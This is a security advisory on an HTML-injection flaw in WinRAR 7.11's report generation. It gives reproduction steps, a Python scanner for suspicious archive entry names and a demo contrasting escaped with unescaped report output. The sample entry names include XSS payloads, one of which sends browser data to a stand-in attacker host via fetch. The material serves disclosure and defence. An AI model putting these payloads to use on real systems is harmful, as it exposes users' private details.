Rarlab WinRAR Cross-Site Scripting Vulnerability in Report Generation Feature

Vulnerability

A cross-site scripting (XSS) vulnerability, more precisely an HTML injection into a locally generated document, has been identified in Rarlab WinRAR version 7.11. The 'Generate report' command writes the names of archived files into the HTML report without escaping characters that have special meaning in HTML (such as <, >, & and quotes). An attacker who supplies an archive whose entry names contain HTML markup therefore controls part of the report's markup; such names are valid inside an archive even though Windows itself does not allow < or > in file names. When the user opens the generated report in a browser, the injected markup is rendered and any script it carries is executed, which can disclose user information such as the computer user name, the directory the report was written to, and the user's IP address (the last, for instance, when the injected markup loads a resource from an attacker-controlled server). Exploitation requires user interaction: the victim must generate the report from the attacker's archive and then open it.

Impact

Successful exploitation lets attacker-supplied HTML and script run in the viewer with which the victim opens the report, not in WinRAR itself. The practical consequences are disclosure of sensitive user information (user name, report directory, IP address) and manipulation of the report's content, so that a user trusting the report can be misled about what the archive contains.

Reproduction

To reproduce this vulnerability, prepare an archive containing an entry whose name includes HTML markup (for example an <img> or <script> element). Open the archive in WinRAR 7.11, run the 'Generate report' command with HTML output, and then open the resulting report file in a browser. Because the file name is copied into the report without escaping, the browser renders the injected markup and executes any script it contains instead of displaying the name as text. The same archive processed by a fixed version produces a report in which the markup appears as literal characters.
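The following is an added example, not code from the advisory or from Rarlab, that performs the check a practitioner would want before running 'Generate report' on an untrusted archive: list the entry names and flag any that carry HTML-significant characters. It constructs a sample ZIP archive in memory because the Python standard library can write ZIP but not RAR; the advisory concerns archives opened in WinRAR, which handles ZIP as well as RAR, and the point demonstrated (that an archive header can hold a name Windows would refuse to create) applies to either format. All entry names, the archive and the set of flagged characters are assumptions made for the example.

```python
import io
import zipfile

# Characters an HTML generator must escape; an entry name containing any of
# them can change the structure of a report that copies names verbatim.
HTML_META = set('<>&"\'')


def suspicious_entries(names):
    """Returns [(name, sorted list of HTML metacharacters found)] for every
    name that would need escaping before being placed in an HTML report."""
    flagged = []
    for name in names:
        hits = sorted(HTML_META.intersection(name))
        if hits:
            flagged.append((name, hits))
    return flagged


def build_sample_archive():
    """Constructed sample archive (not a real attacker artefact).

    Entry names are just bytes in the archive header, so a name that Windows
    itself rejects, such as one containing '<' and '>', is perfectly storable
    and is what WinRAR would print into the report."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report/summary.txt", "harmless")
        zf.writestr('<img src=x onerror="alert(1)">.txt', "payload carrier")
        zf.writestr("Tom & Jerry.mp4", "ampersand only; breaks entity parsing")
    return buf.getvalue()


def scan_archive(data):
    """Lists the archive and returns the suspicious entries."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return suspicious_entries(zf.namelist())


if __name__ == "__main__":
    for name, chars in scan_archive(build_sample_archive()):
        print(f"suspicious entry {name!r}: contains {''.join(chars)}")
```

Run it on a real archive by replacing `build_sample_archive()` with the bytes of the file; for a RAR archive, feed `suspicious_entries()` the names from any listing tool instead. A non-empty result means the report generated by an unpatched WinRAR will contain raw markup.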

Remediation

Users are advised to update to WinRAR version 7.12 beta 1 or later, which escapes HTML-special characters in file names before writing them into the report produced by the 'Generate report' command, so that injected markup is displayed as text rather than interpreted. Until the update is applied, treat HTML reports generated from untrusted archives as untrusted documents: inspect entry names for markup before generating a report, or open the report in a viewer that does not execute script.
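To make the defect described under Vulnerability and the fix described under Remediation concrete, here is an added example (not WinRAR's code, whose actual report template is not shown in this advisory) that builds a minimal HTML report from a list of entry names in two ways: copying names verbatim, as 7.11 is described as doing, and passing them through an HTML escaper, as the fix does. A small checker then shows which version lets markup from the names reach the page as active elements. The entry names, the report layout and the report directory path are constructed for the example.

```python
import html
import re

# Constructed entry names: two harmless, two carrying HTML markup. Such names
# cannot exist on a Windows file system but can sit in an archive header.
ENTRY_NAMES = [
    "README.txt",
    "docs/manual.pdf",
    '<img src="x" onerror="alert(document.location)">.txt',
    "<script>fetch('https://attacker.example/?u=' + encodeURIComponent(navigator.userAgent))</script>",
]

# Constructed path standing in for the local detail (user name, report
# directory) that a report written to disk ends up carrying.
REPORT_DIR = r"C:\Users\alice\Documents"


def render_report_vulnerable(names, report_dir):
    """Assumed 7.11-style behaviour: untrusted strings are concatenated into
    the markup unchanged, so a name can close the cell and open elements."""
    rows = "\n".join(f"<tr><td>{name}</td></tr>" for name in names)
    return (
        "<html><body>"
        f"<p>Report directory: {report_dir}</p>"
        f"<table>\n{rows}\n</table></body></html>"
    )


def render_report_escaped(names, report_dir):
    """Fixed behaviour: every untrusted string goes through html.escape(),
    which turns < > & and quotes into entity references the browser shows
    as text."""
    rows = "\n".join(
        f"<tr><td>{html.escape(name, quote=True)}</td></tr>" for name in names
    )
    return (
        "<html><body>"
        f"<p>Report directory: {html.escape(report_dir)}</p>"
        f"<table>\n{rows}\n</table></body></html>"
    )


# Elements that can run script or make a request when rendered.
ACTIVE_TAG_RE = re.compile(r"<(script|img|iframe|svg|object|embed|a)\b", re.IGNORECASE)


def injected_tags(report_html):
    """Returns the active element names that appear inside table cells, i.e.
    markup that came from entry names rather than from the report template."""
    cells = re.findall(r"<td>(.*?)</td>", report_html, re.DOTALL)
    found = []
    for cell in cells:
        found.extend(m.group(1).lower() for m in ACTIVE_TAG_RE.finditer(cell))
    return found


if __name__ == "__main__":
    print("unescaped report injects:", injected_tags(render_report_vulnerable(ENTRY_NAMES, REPORT_DIR)))
    print("escaped report injects:  ", injected_tags(render_report_escaped(ENTRY_NAMES, REPORT_DIR)))
```

The escaper is the whole fix: the layout of the report is unchanged, but a name such as `<script>...</script>` reaches the browser as `&lt;script&gt;...&lt;/script&gt;` and is displayed rather than executed. Note that escaping must also cover quotes when a name lands inside an attribute value, which is why `quote=True` is used.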

Added: Nov 12, 2025, 6:32 PM
Updated: Nov 12, 2025, 11:13 PM

Vulnerability Rating

Custom Algorithm

metric          score
spread          8.4
impact          3.5
exploitability  4.8
remediation     7.7
relevance       0.9
threat          1.6
urgency         2.9
incentive       0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.